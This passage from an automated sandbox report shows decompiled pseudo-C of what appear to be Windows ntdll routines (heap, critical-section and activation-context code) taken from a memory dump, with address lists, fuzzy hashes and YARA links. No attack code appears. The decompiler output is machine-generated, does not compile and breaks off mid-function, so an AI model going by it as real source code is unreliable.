					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E014A95D0();
					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                    0x0149d29c
                    0x0149d2a6
                    0x0149d2b1
                    0x0149d2b5
                    0x0149d2b6
                    0x0149d2bc
                    0x0149d2bd
                    0x0149d2be
                    0x0149d2bf
                    0x0149d2c2
                    0x0149d2c4
                    0x0149d2cc
                    0x0149d384
                    0x0149d34b
                    0x0149d34f
                    0x0149d350
                    0x0149d351
                    0x0149d35c
                    0x0149d35c
                    0x0149d2d6
                    0x0149d2da
                    0x0149d2e1
                    0x0149d361
                    0x0149d369
                    0x0149d36d
                    0x0149d2e3
                    0x0149d2e3
                    0x0149d2e3
                    0x0149d2e5
                    0x0149d2ed
                    0x0149d2f5
                    0x0149d2fa
                    0x0149d302
                    0x0149d303
                    0x0149d30b
                    0x0149d30f
                    0x0149d313
                    0x0149d318
                    0x0149d31c
                    0x0149d320
                    0x0149d379
                    0x0149d37d
                    0x00000000
                    0x00000000
                    0x014daffe
                    0x014db001
                    0x014db011
                    0x00000000
                    0x0149d322
                    0x0149d322
                    0x0149d330
                    0x0149d337
                    0x0149d35d
                    0x0149d339
                    0x0149d33f
                    0x0149d38c
                    0x0149d38c
                    0x0149d33f
                    0x0149d349
                    0x00000000
                    0x0149d349

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: d1ace80742fc734966ebcc0529fa005927c937338300c49c205eb4a3932664f3
                    • Instruction ID: 77f4baac39075afe97c4dedc9748065349d2451ec0e0a53258b7b04ca88bdf94
                    • Opcode Fuzzy Hash: d1ace80742fc734966ebcc0529fa005927c937338300c49c205eb4a3932664f3
                    • Instruction Fuzzy Hash: C931A2B29083059FCB21DF69C98096FBFE8EB95654F45092FF99483260D634DD05CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01471B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E01471B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E014ABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E014AA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E014AA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01484620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                    0x01471b8f
                    0x01471b9a
                    0x01471b9c
                    0x01471b9e
                    0x01471ba3
                    0x014c7010
                    0x014c7010
                    0x00000000
                    0x01471ba9
                    0x01471ba9
                    0x01471bae
                    0x00000000
                    0x01471bc5
                    0x01471bca
                    0x01471bcf
                    0x01471bd0
                    0x01471bd1
                    0x01471bd2
                    0x01471bd6
                    0x01471bdc
                    0x01471be0
                    0x014c6ffc
                    0x014c7000
                    0x00000000
                    0x014c7006
                    0x014c7009
                    0x014c7009
                    0x01471be6
                    0x01471bec
                    0x01471c0b
                    0x01471c0b
                    0x01471c0c
                    0x01471c11
                    0x01471c12
                    0x01471c15
                    0x01471c1b
                    0x01471c1f
                    0x01471c31
                    0x01471c33
                    0x014c7026
                    0x014c7026
                    0x01471c21
                    0x01471c24
                    0x01471c24
                    0x01471bee
                    0x01471bee
                    0x01471bf2
                    0x01471c3a
                    0x01471bf4
                    0x01471bf4
                    0x01471c05
                    0x01471c05
                    0x01471c09
                    0x01471c3e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01471c09
                    0x01471bec
                    0x01471be0
                    0x01471bae
                    0x01471c2e

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: WindowsExcludedProcs
                    • API String ID: 0-3583428290
                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction ID: 966b5ec64fa0832f98801c3966055848c5d3c875fb0ae263680f67ab98029509
                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction Fuzzy Hash: C221FB7E500115AFDB219E9AC940F9B7B6DEF50E51F16442BFE049B320D630DD01D7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0148F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0148F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                    0x0148f71d
                    0x0148f722
                    0x0148f726
                    0x014d4770
                    0x0148f765
                    0x0148f769
                    0x0148f769
                    0x0148f732
                    0x014d477a
                    0x00000000
                    0x014d477a
                    0x0148f738
                    0x0148f73a
                    0x0148f73c
                    0x0148f73f
                    0x0148f746
                    0x0148f778
                    0x0148f7a9
                    0x0148f7a9
                    0x0148f754
                    0x0148f75a
                    0x0148f75d
                    0x0148f75f
                    0x0148f761
                    0x0148f76f
                    0x0148f771
                    0x0148f771
                    0x0148f76f
                    0x0148f763
                    0x00000000
                    0x0148f763
                    0x0148f77d
                    0x0148f7a3
                    0x0148f7a5
                    0x00000000
                    0x0148f7a5
                    0x0148f77f
                    0x0148f782
                    0x0148f784
                    0x0148f786
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0148f788
                    0x0148f748
                    0x0148f74d
                    0x0148f78d
                    0x0148f793
                    0x0148f7b7
                    0x0148f7bc
                    0x00000000
                    0x0148f7bc
                    0x0148f798
                    0x00000000
                    0x00000000
                    0x0148f79d
                    0x0148f7b0
                    0x00000000
                    0x0148f7b0
                    0x0148f79f
                    0x00000000
                    0x0148f74f
                    0x0148f74f
                    0x00000000
                    0x0148f74f

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Actx
                    • API String ID: 0-89312691
                    • Opcode ID: 9b646f75e5414476b6fe1b7a6890b2deb95250b59e7c424fa517def25e2b48f9
                    • Instruction ID: 6f7136dd804cd52cf6cbbc58b41d96bb5ea133c1bc76f4139bc3b6c4f2f8eb73
                    • Opcode Fuzzy Hash: 9b646f75e5414476b6fe1b7a6890b2deb95250b59e7c424fa517def25e2b48f9
                    • Instruction Fuzzy Hash: CE11C4397047028BFB257E1D889073F7695EB86624F25463BE561CB3B1DB74D84A8340
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01518DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E01518DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1540d50);
				E014BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E014F5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L014BDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L014BDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E014BD130(_t34, _t39, _t40);
			}





                    0x01518df1
                    0x01518df1
                    0x01518df1
                    0x01518df1
                    0x01518df1
                    0x01518df1
                    0x01518df3
                    0x01518df8
                    0x01518dfd
                    0x01518e00
                    0x01518e0e
                    0x01518e2a
                    0x01518e36
                    0x01518e38
                    0x01518e3c
                    0x01518e46
                    0x01518e46
                    0x01518e36
                    0x01518e50
                    0x01518e56
                    0x01518e59
                    0x01518e5c
                    0x01518e60
                    0x01518e67
                    0x01518e6d
                    0x01518e73
                    0x01518e74
                    0x01518eb1
                    0x01518ebd

                    Strings
                    • Critical error detected %lx, xrefs: 01518E21
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Critical error detected %lx
                    • API String ID: 0-802127002
                    • Opcode ID: 05e0c68bb70af443ff1c3f8ff1986f65c16e900cd775de5c18686f80bdeaa412
                    • Instruction ID: 4ed4413c188001b45c3c0ebca7eadc1d6f98d26cf5a282479ef35fb01b26026a
                    • Opcode Fuzzy Hash: 05e0c68bb70af443ff1c3f8ff1986f65c16e900cd775de5c18686f80bdeaa412
                    • Instruction Fuzzy Hash: 7A113971D14348DBEB29CFA985457DDBBB1BB14318F24426EE569AB3A2C3345A02CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014FFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                    Download Yara Rule
                    Strings
                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 014FFF60
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                    • API String ID: 0-1911121157
                    • Opcode ID: c65571ffd6a696443e3ee0e318c070ac2423a9eaa67f0372fc9728ee0543304a
                    • Instruction ID: bfcba7e76358073bee0ee36b2084240ea87304f17997352b283e18d64f2ccf9b
                    • Opcode Fuzzy Hash: c65571ffd6a696443e3ee0e318c070ac2423a9eaa67f0372fc9728ee0543304a
                    • Instruction Fuzzy Hash: 5411E172910244EFDB22DB54C898F997BB1FB18718F15809AE6086B3B1C7399948DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01535BA5, Relevance: .6, Instructions: 592COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E01535BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1541178);
				E014BD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01534C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E014AD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01535542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x15560e8;
								if( *0x15560e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x15560e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E014A9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E014A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E014AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E014AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E014AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E014AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E014AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
